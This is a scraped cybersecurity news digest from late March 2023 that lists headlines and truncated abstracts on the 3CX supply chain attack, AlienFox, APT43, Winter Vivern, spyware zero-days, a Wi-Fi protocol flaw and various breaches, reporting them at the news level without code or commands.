March, 2023
March 31, 2023 – General
The Role of International Assistance in Cyber Incident Response
Abstract
Some cybersecurity incidents can render crucial government services inaccessible, as recent events in Costa Rica and Vanuatu exemplify. In these cases, international assistance can be a key part of the response. – Lawfare
March 31, 2023 – Vulnerabilities
Hackers are actively exploiting a flaw in the Elementor Pro WordPress plugin
Abstract
Threat actors are actively exploiting a high-severity flaw in the Elementor Pro WordPress plugin used by more than eleven million websites. WordPress security firm PatchStack warns of a high-severity vulnerability in the Elementor Pro WordPress... – Security Affairs
March 31, 2023 – Vulnerabilities
Here’s how attackers could have changed Bing search results
Abstract
An Azure Active Directory (AAD) misconfiguration by Microsoft in one of its own cloud-hosted applications could have allowed miscreants to subvert the IT giant's Bing search engine – even changing search results. – Cyware
March 31, 2023 – Criminals
Cyber Police of Ukraine arrested members of a gang that defrauded EU citizens of $4.33M
Abstract
The Cyber Police of Ukraine, with law enforcement officials from Czechia, has arrested several members of a gang responsible for a $4.33 million scam. The Cyber Police of Ukraine, with the support of law enforcement officials from the Czech Republic,... – Security Affairs
March 31, 2023 – Government
Biden administration goes global in effort to constrain spyware use
Abstract
A coalition of 11 countries committed on Thursday to counter the misuse of commercial spyware, a step toward building an international agreement to curb technology deployed by authoritarian countries to spy on dissidents and journalists. – Cyware
March 31, 2023 – APT
Winter Vivern APT Targets European Government Entities with Zimbra Vulnerability
Abstract
The advanced persistent threat (APT) actor known as Winter Vivern is now targeting officials in Europe and the U.S. as part of an ongoing cyber espionage campaign. "TA473 since at least February 2023 has continuously leveraged an unpatched Zimbra vulnerability in publicly facing webmail portals that allows them to gain access to the email mailboxes of government entities in Europe," Proofpoint said in a new report. The enterprise security firm is tracking the activity under its own moniker TA473 (aka UAC-0114), describing it as an adversarial crew whose operations align with those of Russian and Belarusian geopolitical objectives. What it lacks in sophistication, it makes up for in persistence. In recent months, the group has been linked to attacks targeting state authorities of Ukraine and Poland as well as government officials in India, Lithuania, Slovakia, and the Vatican. The NATO-related intrusion wave entails the exploitation of CVE-2022-27926 (CVSS score:... – The Hacker News
March 31, 2023
Russian APT group Winter Vivern targets email portals of NATO and diplomats
Abstract
Russian hacking group Winter Vivern has been actively exploiting Zimbra flaws to steal the emails of NATO and diplomats. A Russian hacking group, tracked as Winter Vivern (aka TA473), has been actively exploiting vulnerabilities (CVE-2022-27926) in unpatched... – Security Affairs
March 31, 2023
Leaked Documents Detail Russia’s Cyberwarfare Tools, Including for OT Attacks
Abstract
The leaked documents, referred to as The Vulkan Files, were obtained by a whistleblower and analyzed by Mandiant in collaboration with several major media outlets in Europe and the United States. – Cyware
March 31, 2023
Cyber Police of Ukraine Busted Phishing Gang Responsible for $4.33 Million Scam
Abstract
The Cyber Police of Ukraine, in collaboration with law enforcement officials from Czechia, has arrested several members of a cybercriminal gang that set up phishing sites to target European users. Two of the apprehended affiliates are believed to be organizers, with 10 others detained in other territories across the European Union. The suspects are alleged to have created more than 100 phishing portals aimed at users in France, Spain, Poland, Czechia, Portugal, and other nations in the region. These websites masqueraded as online portals offering heavily discounted products below market prices to lure unsuspecting users into placing fake "orders." In reality, the financial information entered on those websites to complete the payments was used to siphon money from the victims' accounts. "For the fraudulent scheme, the participants also created two call centers, in Vinnytsia and in Lviv, and involved operators in their work," the Cyber Police said. – The Hacker News
March 31, 2023
Update: DXC Technology says global network is not compromised following Latitude Financial breach
Abstract
Soon after Latitude Financial revealed it suffered a cyberattack, DXC Technology quietly published a note on its website stating its global network and customer support networks were not compromised. – Cyware
March 31, 2023
Deep Dive Into 6 Key Steps to Accelerate Your Incident Response
Abstract
Organizations rely on incident response to ensure they are immediately aware of security incidents, allowing for quick action to minimize damage. They also aim to avoid follow-on attacks or future related incidents. The SANS Institute provides research and education on information security. In the upcoming webinar, we'll outline, in detail, six components of a SANS incident response plan, including elements such as preparation, identification, containment, and eradication. The 6 steps of a complete IR: Preparation: This is the first phase and involves reviewing existing security measures and policies; performing risk assessments to find potential vulnerabilities; and establishing a communication plan that lays out protocols and alerts staff to potential security risks. During the holidays, the preparation stage of your IR plan is crucial as it gives you the opportunity to communicate holiday-specific threats and put the wheels in motion to address such threats as they are identif... – The Hacker News
March 31, 2023
Hack-for-Hire Groups Provide Corporate Espionage
Abstract
While hack-for-hire groups may advertise, they aren’t usually helping clients get a cryptocurrency payout. And you can’t sign up for a subscription service. It’s more than likely that hack-for-hire clients have a specific target and goal in mind. – Cyware
March 31, 2023
3CX Supply Chain Attack — Here’s What We Know So Far
Abstract
Enterprise communications software maker 3CX on Thursday confirmed that multiple versions of its desktop app for Windows and macOS are affected by a supply chain attack. The version numbers include 18.12.407 and 18.12.416 for Windows and 18.11.1213, 18.12.402, 18.12.407, and 18.12.416 for macOS. The company said it's engaging the services of Google-owned Mandiant to review the incident. In the interim, it's urging its customers of self-hosted and on-premise versions of the software to update to version 18.12.422. "3CX Hosted and StartUP users do not need to update their servers as we will be updating them over the night automatically," 3CX CEO Nick Galea said in a blog post. "Servers will be restarted and the new Electron App MSI/DMG will be installed on the server." Evidence available so far points to either a compromise of 3CX's software build pipeline to distribute Windows and macOS versions of the app package, or alternatively, the poiso... – The Hacker News
March 31, 2023
The US Is Sending Money to Countries Devastated by Cyberattacks
Abstract
Almost a year after the crisis began, a senior White House official told reporters today that the United States plans to provide $25 million in cybersecurity assistance to help Costa Rica strengthen its digital infrastructure. – Cyware
March 30, 2023 – Cryptocurrency
Tor Goes Wrong: Malware Steals $400k in Cryptocurrency
Abstract
Are you a crypto user addicted to Tor? Tor browser users across the world are under attack with trojanized versions of Tor browser installers, especially those in Russia and nearby regions. These infected browsers were being promoted as "security-strengthened" versions of the browser. Kaspersky war... – Cyware
March 30, 2023 – Vulnerabilities
Researchers Detail Severe “Super FabriXss” Vulnerability in Microsoft Azure SFX
Abstract
Details have emerged about a now-patched vulnerability in Azure Service Fabric Explorer (SFX) that could lead to unauthenticated remote code execution. Tracked as CVE-2023-23383 (CVSS score: 8.2), the issue has been dubbed "Super FabriXss" by Orca Security, a nod to the FabriXss flaw (CVE-2022-35829, CVSS score: 6.2) that was fixed by Microsoft in October 2022. "The Super FabriXss vulnerability enables remote attackers to leverage an XSS vulnerability to achieve remote code execution on a container hosted on a Service Fabric node without the need for authentication," security researcher Lidor Ben Shitrit said in a report shared with The Hacker News. XSS refers to a kind of client-side code injection attack that makes it possible to upload malicious scripts into otherwise trusted websites. The scripts then get executed every time a victim visits the compromised website, thereby leading to unintended consequences. While both FabriXss and Super FabriXss... – The Hacker News
March 30, 2023 – Vulnerabilities
Super FabriXss vulnerability in Microsoft Azure SFX could lead to RCE
Abstract
Researchers shared details about a flaw, dubbed Super FabriXss, in Azure Service Fabric Explorer (SFX) that could lead to unauthenticated remote code execution. Researchers from Orca Security shared details about a new vulnerability, dubbed Super... – Security Affairs
March 30, 2023 – Malware
DBatLoader Sweeps European Countries With Multiple Malware Payloads
Abstract
A new phishing campaign has surfaced to drop Remcos RAT and Formbook malware through the DBatLoader malware loader, revealed Zscaler researchers. The campaign is aimed at compromising systems in Europe. Actors also leverage a multi-layered obfuscated HTML file and OneNote attachments to propagate the D... – Cyware
March 30, 2023 – Hacker
Chinese RedGolf Group Targeting Windows and Linux Systems with KEYPLUG Backdoor
Abstract
A Chinese state-sponsored threat activity group tracked as RedGolf has been attributed to the use of a custom Windows and Linux backdoor called KEYPLUG. "RedGolf is a particularly prolific Chinese state-sponsored threat actor group that has likely been active for many years against a wide range of industries globally," Recorded Future told The Hacker News. "The group has shown the ability to rapidly weaponize newly reported vulnerabilities (e.g. Log4Shell and ProxyLogon) and has a history of developing and using a large range of custom malware families." The use of KEYPLUG by Chinese threat actors was first disclosed by Google-owned Mandiant in March 2022 in attacks targeting multiple U.S. state government networks between May 2021 and February 2022. Then in October 2022, Malwarebytes detailed a separate set of attacks targeting government entities in Sri Lanka in early August that leveraged a novel implant dubbed DBoxAgent to deploy KEYPLUG. Bot... – The Hacker News
March 30, 2023 – Malware
New AlienFox toolkit harvests credentials for tens of cloud services
Abstract
AlienFox is a novel comprehensive toolset for harvesting credentials for multiple cloud service providers, SentinelLabs reported. AlienFox is a new modular toolkit that allows threat actors to harvest credentials for multiple cloud service providers. AlienFox... – Security Affairs
March 30, 2023 – Phishing
AI chatbots making it harder to spot phishing emails, say experts
Abstract
AI allows you to craft very believable ‘spear-phishing’ emails and other written communication with very little effort, especially compared to what you had to do before. – Cyware
March 30, 2023 – Vulnerabilities
New Wi-Fi Protocol Security Flaw Affecting Linux, Android and iOS Devices
Abstract
A group of academics from Northeastern University and KU Leuven has disclosed a fundamental design flaw in the IEEE 802.11 Wi-Fi protocol standard, impacting a wide range of devices running Linux, FreeBSD, Android, and iOS. The shortcoming could be abused to hijack TCP connections or intercept client and web traffic, researchers Domien Schepers, Aanjhan Ranganathan, and Mathy Vanhoef said in a paper published this week. The approach exploits power-save mechanisms in endpoint devices to trick access points into leaking data frames in plaintext, or encrypting them using an all-zero key. "The unprotected nature of the power-save bit in a frame's header [...] also allows an adversary to force queue frames intended for a specific client resulting in its disconnection and trivially executing a denial-of-service attack," the researchers noted. In other words, the goal is to leak frames from the access point destined to a victim client station... – The Hacker News
March 30, 2023 – Attack
3CX voice and video conferencing software victim of a supply chain attack
Abstract
Popular voice and video conferencing software 3CX was the victim of a supply chain attack, SentinelOne researchers reported. As of Mar 22, 2023, SentinelOne observed a spike in behavioral detections of the 3CXDesktopApp, which is a popular voice and video... – Security Affairs
March 30, 2023 – Business
DataDome, which uses AI to protect against bot-based attacks, raises $42M
Abstract
Benjamin Fabre founded DataDome in 2015 with Fabien Grenier, a longtime business partner, after the pair made the observation that most companies weren’t able to detect and block bots. – Cyware
March 30, 2023 – Solution
Cyberstorage: Leveraging the Multi-Cloud to Combat Data Exfiltration
Abstract
Multi-cloud data storage, once merely a byproduct of the great cloud migration, has now become a strategy for data management. "Multi-cloud by design," and its companion the supercloud, is an ecosystem in which several cloud systems work together to provide many organizational benefits, including increased scale and overall resiliency. And now, even security teams, who have long been the holdout on wide-scale cloud adoption, may find a reason to rejoice. Born out of the multi-cloud approach, cyberstorage enables companies to not only enjoy the benefits that multi-cloud brings but also eliminate the risk of data exposure at the same time, marking the beginning of the multi-cloud maturity era. What Is The Supercloud? While many organizations ended up with multiple cloud services as a byproduct of interdepartmental needs, today organizations are intentionally building multi-cloud environments. And rather than manage the various cloud services individually, many are implementin... – The Hacker News
March 30, 2023 – Malware
New Mélofée Linux malware linked to Chinese APT groups
Abstract
ExaTrack researchers warn of an unknown China-linked hacking group that has been linked to a new Linux malware, dubbed Mélofée. Cybersecurity researchers from ExaTrack recently discovered a previously undetected malware family, dubbed Mélofée,... – Security Affairs
March 30, 2023 – Vulnerabilities
Azure Pipelines vulnerability spotlights supply chain threats
Abstract
The Azure Pipelines flaw affected both the SaaS version of Azure DevOps Server and the self-hosted, on-premises version. Customers running the on-premises version need to patch their instances to remediate the RCE vulnerability. – Cyware
March 30, 2023 – Malware
AlienFox Malware Targets API Keys and Secrets from AWS, Google, and Microsoft Cloud Services
Abstract
A new "comprehensive toolset" called AlienFox is being distributed on Telegram as a way for threat actors to harvest credentials from API keys and secrets from popular cloud service providers. "The spread of AlienFox represents an unreported trend towards attacking more minimal cloud services, unsuitable for crypto mining, in order to enable and expand subsequent campaigns," SentinelOne security researcher Alex Delamotte said in a report shared with The Hacker News. The cybersecurity company characterized the malware as highly modular and constantly evolving to accommodate new features and performance improvements. The primary use of AlienFox is to enumerate misconfigured hosts via scanning platforms like LeakIX and SecurityTrails, and subsequently leverage various scripts in the toolkit to extract credentials from configuration files exposed on the servers. Specifically, it entails searching for susceptible servers associated with popular web framewor... – The Hacker News
March 30, 2023 – Malware
NullMixer Campaign Delivers New Polymorphic Loaders
Abstract
Researchers spotted a new malware operation, named NullMixer, that hit over 8,000 targets within a week, with a special focus on North America, Italy, and France. The attackers use SEO poisoning, along with social engineering tactics, to lure their potential victims, consisting mostly of IT personne... – Cyware
March 30, 2023 – Attack
3CX Desktop App Supply Chain Attack Leaves Millions at Risk - Urgent Update on the Way!
Abstract
3CX said it's working on a software update for its desktop app after multiple cybersecurity vendors sounded the alarm on what appears to be an active supply chain attack that's using digitally signed and rigged installers of the popular voice and video conferencing software to target downstream customers. "The trojanized 3CX desktop app is the first stage in a multi-stage attack chain that pulls ICO files appended with Base64 data from GitHub and ultimately leads to a third-stage infostealer DLL," SentinelOne researchers said. The cybersecurity firm is tracking the activity under the name SmoothOperator, stating the threat actor registered a massive attack infrastructure as far back as February 2022. There are indications that the attack may have commenced around March 22, 2023. 3CX, the company behind 3CXDesktopApp, claims to have more than 600,000 customers and 12 million users in 190 countries, some of which include well-known names like American Expres... – The Hacker News
March 30, 2023 – General
Phishing Emails Up a Whopping 569% in 2022
Abstract
The number of credential phishing emails sent spiked by 478%. Emotet and QakBot are the top malware families observed. For the eighth consecutive year, business email compromise (BEC) ranked as the top cybercrime. – Cyware
March 30, 2023 – General
Cyber Storm Predicted at the 2023 World Economic Forum
Abstract
A majority of organizations reported that global geopolitical instability has influenced their cyber strategy “moderately” or “substantially”. Their biggest concerns regarding cyberattacks are business continuity (67%) and reputational damage (65%). – Cyware
March 29, 2023 – Breach
Hackers compromise 3CX desktop app in a supply chain attack
Abstract
A digitally signed and trojanized version of the 3CX Voice Over Internet Protocol (VOIP) desktop client is reportedly being used to target the company's customers in an ongoing supply chain attack. – BleepingComputer
March 29, 2023 – APT
Bitter APT Espionage Group Targets Nuclear Energy Firms in China
Abstract
The nuclear energy sector of China is reportedly facing threats from Bitter, a South Asian APT. The group specializes in using Excel exploits, Windows Installer (MSI) files, and Microsoft Compiled HTML Help (CHM) files. Besides, the group is infamous for targeting energy and government organization... – Cyware
March 29, 2023 – Privacy
Spyware Vendors Caught Exploiting Zero-Day Vulnerabilities on Android and iOS Devices
Abstract
A number of zero-day vulnerabilities that were addressed last year were exploited by commercial spyware vendors to target Android and iOS devices, Google's Threat Analysis Group (TAG) has revealed. The two distinct campaigns were both limited and highly targeted, taking advantage of the patch gap between the release of a fix and when it was actually deployed on the targeted devices. "These vendors are enabling the proliferation of dangerous hacking tools, arming governments that would not be able to develop these capabilities in-house," TAG's Clement Lecigne said in a new report. "While use of surveillance technologies may be legal under national or international laws, they are often found to be used by governments to target dissidents, journalists, human rights workers, and opposition party politicians." The first of the two operations took place in November 2022 and involved sending shortened links over SMS messages to users located in Italy, Malays... – The Hacker News
March 29, 2023 – Policy and Law
Enforcement of Cybersecurity Regulations: Part 2
Abstract
While a valuable part of a cybersecurity program, “third-party audits” are too often not audits and not done by true third parties. – Lawfare
March 29, 2023 – Vulnerabilities
QNAP fixed Sudo privilege escalation bug in NAS devices
Abstract
Taiwanese vendor QNAP warns customers to patch a high-severity Sudo privilege escalation bug affecting NAS devices. Taiwanese vendor QNAP warns customers to update their network-attached storage (NAS) devices to address a high-severity Sudo privilege... – Security Affairs
March 29, 2023 – Breach
SafeMoon ‘burn’ bug abused to drain $8.9 million from liquidity pool
Abstract
The SafeMoon token liquidity pool lost $8.9 million after a hacker exploited a newly created 'burn' smart contract function that artificially inflated the price, allowing the actors to sell SafeMoon at a much higher price. – BleepingComputer
March 29, 2023 – Hacker
Hackers Distribute MacStealer MaaS to Target Mac Users
Abstract
MacStealer is a new information-stealing malware threat attempting to pilfer sensitive information from compromised macOS devices. The malware uses Telegram as its C2 channel and specifically affects devices running Catalina and later versions on M1 and M2 CPUs. It can harvest documents, browser co... – Cyware
March 29, 2023 – Malware
Mélofée: Researchers Uncover New Linux Malware Linked to Chinese APT Groups
Abstract
An unknown Chinese state-sponsored hacking group has been linked to a novel piece of malware aimed at Linux servers. French cybersecurity firm ExaTrack, which found three samples of the previously undocumented malicious software that date back to early 2022, dubbed it Mélofée. One of the artifacts is designed to drop a kernel-mode rootkit that's based on an open source project referred to as Reptile. "According to the vermagic metadata, it is compiled for a kernel version 5.10.112-108.499.amzn2.x86_64," the company said in a report. "The rootkit has a limited set of features, mainly installing a hook designed for hiding itself." Both the implant and the rootkit are said to be deployed using shell commands that download an installer and a custom binary package from a remote server. The installer takes the binary package as an argument and then extracts the rootkit as well as a server implant module that's currently under active development. Mélofé... – The Hacker News
March 29, 2023 – Breach
Australia’s Casino Giant Crown Resorts disclosed data breach after Clop ransomware attack
Abstract
Australia's gambling and entertainment giant Crown Resorts disclosed a data breach caused by the exploitation of a recently discovered GoAnywhere zero-day. Australian casino giant Crown Resorts disclosed a data breach after the attack of the Cl0p ransomware... – Security Affairs
March 29, 2023 – Vulnerabilities
QNAP warns customers to patch Linux Sudo flaw in NAS devices
Abstract
Taiwanese hardware vendor QNAP warns customers to secure their Linux-powered network-attached storage (NAS) devices against a high-severity Sudo privilege escalation vulnerability. – BleepingComputer
March 29, 2023 – Denial Of Service
Killnet and AnonymousSudan DDoS attack Australian University websites; Threaten More Attacks
Abstract
As seen with past attacks from this group, these most recent attacks do not seem to be originating from a single botnet, and the attack methods and sources seem to vary, suggesting the involvement of multiple individual threat actors. – Cyware
March 29, 2023 – Education
How to Build a Research Lab for Reverse Engineering — 4 Ways
Abstract
Malware analysis is an essential part of a security researcher's work. But working with malicious samples can be dangerous — it requires specialized tools to record their activity, and a secure environment to prevent unintended damage. However, manual lab setup and configuration can prove to be a laborious and time-consuming process. In this article, we'll look at 4 ways to create a reverse engineering lab, discuss how to save time and, potentially, improve the detection rate using a cloud service, and give a recommended list of tools for a comprehensive setup. What is a malware analysis lab? In essence, a malware analysis lab provides a safe, isolated space for examining malware. The setup can range from a straightforward virtual machine using VirtualBox to a more intricate network of interconnected machines and actual networking hardware. But in this article, we'll look at building a lab tailored for static analysis, so what we will need is a secure environment where we... – The Hacker News
March 29, 2023 – Vulnerabilities
OpenAI quickly fixed account takeover bugs in ChatGPT
Abstract
OpenAI addressed multiple severe vulnerabilities in the popular chatbot ChatGPT that could have been exploited to take over accounts. OpenAI addressed multiple severe vulnerabilities in ChatGPT that could have allowed attackers to take over user accounts... – Security Affairs
March 29, 2023 – Vulnerabilities
Microsoft Defender mistakenly tagging URLs as malicious
Abstract
Microsoft Defender is mistakenly flagging legitimate links as malicious, with some customers having already received dozens of alert emails since the issues began over five hours ago. – BleepingComputer
March 29, 2023 – General
New API Report Shows 400% Increase in Attackers
Abstract
The report also found that 80% of attacks happened over authenticated APIs, making it a widespread problem for all. Given that it is one of the easiest types of attack to execute, it is no surprise that attackers are increasingly taking this route. – Cyware
March 29, 2023 – General
Smart Mobility has a Blindspot When it Comes to API Security
Abstract
The emergence of smart mobility services and applications has led to a sharp increase in the use of APIs in the automotive industry. However, this increased reliance on APIs has also made them one of the most common attack vectors. According to Gartner, APIs account for 90% of the web application attack surface areas. Unsurprisingly, similar trends are also emerging in the smart mobility space. A recent Automotive and Smart Mobility Cybersecurity Report by Upstream Security indicates that the automotive and smart mobility ecosystem has seen a 380% increase in API-based incidents in 2022, compared to 2021. Additionally, APIs accounted for 12% of total cyber incidents in 2022, up from only 2% in 2021. When examining smart mobility applications and services, Upstream's threat intelligence team reported that black-hat actors were found to be behind 53% of incidents, indicating malicious intent as the driving force of the majority of API-related attacks. The impact of these in... – The Hacker News
March 29, 2023 – Privacy
Google TAG shares details about exploit chains used to install commercial spyware
Abstract
Google's Threat Analysis Group (TAG) discovered several exploit chains targeting Android, iOS, and Chrome to install commercial spyware. Google's Threat Analysis Group (TAG) shared details about two distinct campaigns which used several zero-day exploits... – Security Affairs
March 29, 2023 – Privacy
Google finds more Android, iOS zero-days used to install spyware
Abstract
Google's Threat Analysis Group (TAG) discovered several exploit chains using Android, iOS, and Chrome zero-day and n-day vulnerabilities to install commercial spyware and malicious apps on targets' devices. – BleepingComputer
March 29, 2023 – General
Ransomware gunning for transport sector’s OT systems next
Abstract
ENISA says the three dominant threats to the transportation sector are ransomware (38 percent), data-related threats (30 percent), and malware (17 percent). However, each subgroup has reported experiencing other attack types than ransomware. – Cyware
March 29, 2023 – Cryptocurrency
Trojanized TOR Browser Installers Spreading Crypto-Stealing Clipper Malware
Abstract
Trojanized installers for the TOR anonymity browser are being used to target users in Russia and Eastern Europe with clipper malware designed to siphon cryptocurrencies since September 2022. "Clipboard injectors [...] can be silent for years, show no network activity or any other signs of presence until the disastrous day when they replace a crypto wallet address," Vitaly Kamluk, director of global research and analysis team (GReAT) for APAC at Kaspersky, said. Another notable aspect of clipper malware is that its nefarious functions are not triggered unless the clipboard data meet specific criteria, making it more evasive. It's not immediately clear how the installers are distributed, but evidence points to the use of torrent downloads or some unknown third-party source since the Tor Project's website has been subjected to blockades in Russia in recent years. Regardless of the method used, the installer launches the legitimate executable, while also s... – The Hacker News
March 29, 2023 – Attack
Clipper attacks use Trojanized TOR Browser installers
Abstract
Researchers discovered malware-laced installers for the TOR browser that are spreading clipper malware in Russia and Eastern Europe. Kaspersky researchers discovered a Trojanized version of the Tor Browser that is spreading clipper malware in Russia... – Security Affairs
March 29, 2023 – Malware
Spyware Vendors Use 0-days and n-days Against Popular Platforms
Abstract
In this blog, researchers have shared details about two distinct campaigns that used various 0-day exploits against Android, iOS, and Chrome and were both limited and highly targeted. – Cyware
March 29, 2023 – APT
North Korean APT43 Group Uses Cybercrime to Fund Espionage Operations
Abstract
A new North Korean nation-state cyber operator has been attributed to a series of campaigns orchestrated to gather strategic intelligence that aligns with Pyongyang's geopolitical interests since 2018. Google-owned Mandiant, which is tracking the activity cluster under the moniker APT43, said the group's motives are both espionage- and financially motivated, leveraging techniques like credential harvesting and social engineering to further its objectives. The monetary angle to its attack campaigns is an attempt on the part of the threat actor to generate funds to meet its "primary mission of collecting strategic intelligence." Victimology patterns suggest that targeting is focused on South Korea, the U.S., Japan, and Europe, spanning government, education, research, policy institutes, business services, and manufacturing sectors. The threat actor was also observed straying off course by striking health-related verticals and pharma companies from October 2020... – The Hacker News
March 29, 2023 – Criminals
DarkBit puts data from Israel’s Technion university on sale
Abstract
The ransomware attack hit Technion on February 12, forcing the university to block all communication networks. DarkBit originally demanded 80 bitcoins as ransom from the university. – Cyware
March 29, 2023 – Solution
Microsoft Security Copilot is a new GPT-4 AI assistant for cybersecurity
Abstract
Powered by OpenAI’s GPT-4 generative AI and Microsoft’s security-specific model, Security Copilot looks like a simple prompt box like any other chatbot. You can ask “what are all the security incidents in my enterprise?” – Cyware
March 29, 2023 – Attack
Google Found Two Spyware Campaigns Targeting Apple and Android Devices Full Text
Abstract
The company did not reveal the spyware vendors involved but said one of the campaigns used a link directing targets to a landing page identical to one Google revealed in November 2022 from Spanish spyware firm Variston IT.Cyware
March 28, 2023 – Malware
Trojanized Tor browsers target Russians with crypto-stealing malware Full Text
Abstract
A surge of trojanized Tor Browser installers targets Russians and Eastern Europeans with clipboard-hijacking malware that steals infected users' cryptocurrency transactions.BleepingComputer
March 28, 2023 – Vulnerabilities
WiFi protocol flaw allows attackers to hijack network traffic Full Text
Abstract
Cybersecurity researchers have discovered a fundamental security flaw in the design of the IEEE 802.11 WiFi protocol standard, allowing attackers to trick access points into leaking network frames in plaintext form.BleepingComputer
March 28, 2023 – General
Microsoft brings GPT-4-powered Security Copilot to incident response Full Text
Abstract
Microsoft today announced Security Copilot, a new ChatGPT-like assistant powered by artificial intelligence that takes advantage of Microsoft's threat intelligence footprint to make faster decisions during incident response and to help with threat hunting and security reporting.BleepingComputer
March 28, 2023 – Breach
Crown Resorts confirms ransom demand after GoAnywhere breach Full Text
Abstract
Crown Resorts, Australia's largest gambling and entertainment company, has confirmed that it suffered a data breach after its GoAnywhere secure file-sharing server was breached using a zero-day vulnerability.BleepingComputer
March 28, 2023 – APT
Newly exposed APT43 hacking group targeting US orgs since 2018 Full Text
Abstract
A new North Korean hacking group has been revealed to be targeting government organizations, academics, and think tanks in the United States, Europe, Japan, and South Korea for the past five years.BleepingComputer
March 28, 2023 – Education
The End-User Password Mistakes Putting Your Organization at Risk Full Text
Abstract
Though there are many ways to create passwords, not all are equally effective. It is important to consider the various ways a password-protected system can fail.BleepingComputer
March 28, 2023 – Breach
Latitude Financial data breach now impacts 14 million customers Full Text
Abstract
Australian loan giant Latitude Financial Services (Latitude) is warning customers that its data breach is much more significant than initially stated, taking the number of affected individuals from 328,000 to 14 million.BleepingComputer
March 28, 2023 – Policy and Law
Three Lawsuits Filed Against BetterHelp in Wake of FTC Action Full Text
Abstract
BetterHelp is facing at least three proposed class action lawsuits after earlier this month settling allegations with the FTC that it violated users' privacy by sharing identifying information with social media platforms including Facebook.Cyware
March 28, 2023 – Solution
Microsoft Introduces GPT-4 AI-Powered Security Copilot Tool to Empower Defenders Full Text
Abstract
Microsoft on Tuesday unveiled Security Copilot in preview, marking its continued push to embed AI-oriented features in an attempt to offer "end-to-end defense at machine speed and scale." Powered by OpenAI's GPT-4 generative AI and its own security-specific model, it's billed as a security analysis tool that enables cybersecurity analysts to quickly respond to threats, process signals, and assess risk exposure. To that end, it collates insights and data from various products like Microsoft Sentinel, Defender, and Intune to help security teams better understand their environment; determine if they are susceptible to known vulnerabilities and exploits; identify ongoing attacks and their scale, and receive remediation instructions; and summarize incidents. Users, for instance, can ask Security Copilot about suspicious user logins over a specific time period, or even employ it to create a PowerPoint presentation outlining an incident and its attack chain. It can alThe Hacker News
March 28, 2023 – Breach
Toyota Italy accidentally leaked sensitive data Full Text
Abstract
Toyota Italy accidentally leaked sensitive data for more than one-and-a-half years, until this March, CyberNews reported. A Japanese multinational accidentally leaked access to its marketing tools, enabling attackers to launch phishing campaigns against...Security Affairs
March 28, 2023 – Attack
Lumen Technologies hit with two separate security incidents Full Text
Abstract
The company has notified law enforcement and is working with outside firms to contain the incidents, according to the filing. It has begun business continuity efforts to restore functionality to its customers’ systems.Cyware
March 28, 2023 – APT
Pakistan-Origin SideCopy Linked to New Cyberattack on India’s Ministry of Defence Full Text
Abstract
An advanced persistent threat (APT) group that has a track record of targeting India and Afghanistan has been linked to a new phishing campaign that delivers Action RAT. According to Cyble, which attributed the operation to SideCopy, the activity cluster is designed to target the Defence Research and Development Organization (DRDO), the research and development wing of India's Ministry of Defence. Known for emulating the infection chains associated with SideWinder to deliver its own malware, SideCopy is a threat group of Pakistani origin that shares overlaps with Transparent Tribe. It has been active since at least 2019. Attack chains mounted by the group involve using spear-phishing emails to gain initial access. These messages come bearing a ZIP archive file that contains a Windows shortcut file (.LNK) masquerading as information about the K-4 ballistic missile developed by DRDO. Executing the .LNK file leads to the retrieval of an HTML application from a remoteThe Hacker News
March 28, 2023 – APT
Bitter APT group targets China’s nuclear energy sector Full Text
Abstract
Intezer researchers reported that a South Asian espionage group, tracked as Bitter, is targeting the Chinese nuclear energy industry. Intezer researchers uncovered a cyberespionage campaign targeting the Chinese nuclear energy sector, they linked...Security Affairs
March 28, 2023 – General
More School Closings Coast-to-Coast Due to Ransomware Full Text
Abstract
Instead of snow days, students now get cyber days off. Cyberattacks are affecting school districts of all sizes from coast-to-coast. Some schools even completely shut down due to the attacks.Cyware
March 28, 2023 – Malware
IcedID Malware Shifts Focus from Banking Fraud to Ransomware Delivery Full Text
Abstract
Multiple threat actors have been observed using two new variants of the IcedID malware in the wild with more limited functionality that removes functionality related to online banking fraud. IcedID, also known as BokBot, started off as a banking trojan in 2017. It's also capable of delivering additional malware, including ransomware. "The well-known IcedID version consists of an initial loader which contacts a Loader [command-and-control] server, downloads the standard DLL Loader, which then delivers the standard IcedID Bot," Proofpoint said in a new report published Monday. One of the new versions is a Lite variant that was previously highlighted as being dropped as a follow-on payload by the Emotet malware in November 2022. Also newly observed in February 2023 is a Forked variant of IcedID. Both these variants are designed to drop what's called a Forked version of IcedID Bot that leaves out the web injects and backconnect functionality that would typicThe Hacker News
March 28, 2023 – Breach
Latitude Data breach is worse than initially estimated. 14 million individuals impacted Full Text
Abstract
Australian loan giant Latitude Financial Services (Latitude) revealed that a data breach it has suffered impacted 14 million customers. The data breach suffered by Latitude Financial Services (Latitude) is much more serious than initially estimated....Security Affairs
March 28, 2023 – General
TikTok Faces Further Bans in Europe Full Text
Abstract
The French Ministry of Transformation and Public Service on Friday announced a ban on all "recreational apps" from government-issued mobile devices, to take effect immediately.Cyware
March 28, 2023 – Solution
Breaking the Mold: Pen Testing Solutions That Challenge the Status Quo Full Text
Abstract
Malicious actors constantly adapt their tactics, techniques, and procedures (TTPs) to political, technological, and regulatory changes. A few emerging threats that organizations of all sizes should be aware of include the following: Increased use of Artificial Intelligence and Machine Learning: Malicious actors are increasingly leveraging AI and machine learning to automate their attacks, allowing them to scale their operations faster than ever before. The exploitation of cloud-based technologies: Cloud-based services are increasingly being targeted by malicious actors due to the lack of visibility and control over these platforms. Increased use of ransomware: Ransomware is becoming a more popular method of attack, allowing malicious actors to monetize their operations quickly. According to CompTIA, ransomware attacks grew by 41% in 2022, while identification and remediation for a breach took 49 days longer than average. Phishing attacks also increasThe Hacker News
March 28, 2023 – Criminals
Europol warns of criminal use of ChatGPT Full Text
Abstract
Europol warns that cybercriminal organizations can take advantage of systems based on artificial intelligence like ChatGPT. EU police body Europol warned about the potential abuse of systems based on artificial intelligence, such as the popular chatbot...Security Affairs
March 28, 2023 – Phishing
Nigerian BEC Scammer Sentenced to Prison in US Full Text
Abstract
The man from Lagos participated in multiple BEC, credit card, work-from-home, check-cashing, and romance scams targeting banks, businesses, and individuals in the US and abroad, including First American Holding Company and MidFirst Bank.Cyware
March 28, 2023 – Malware
Stealthy DBatLoader Malware Loader Spreading Remcos RAT and Formbook in Europe Full Text
Abstract
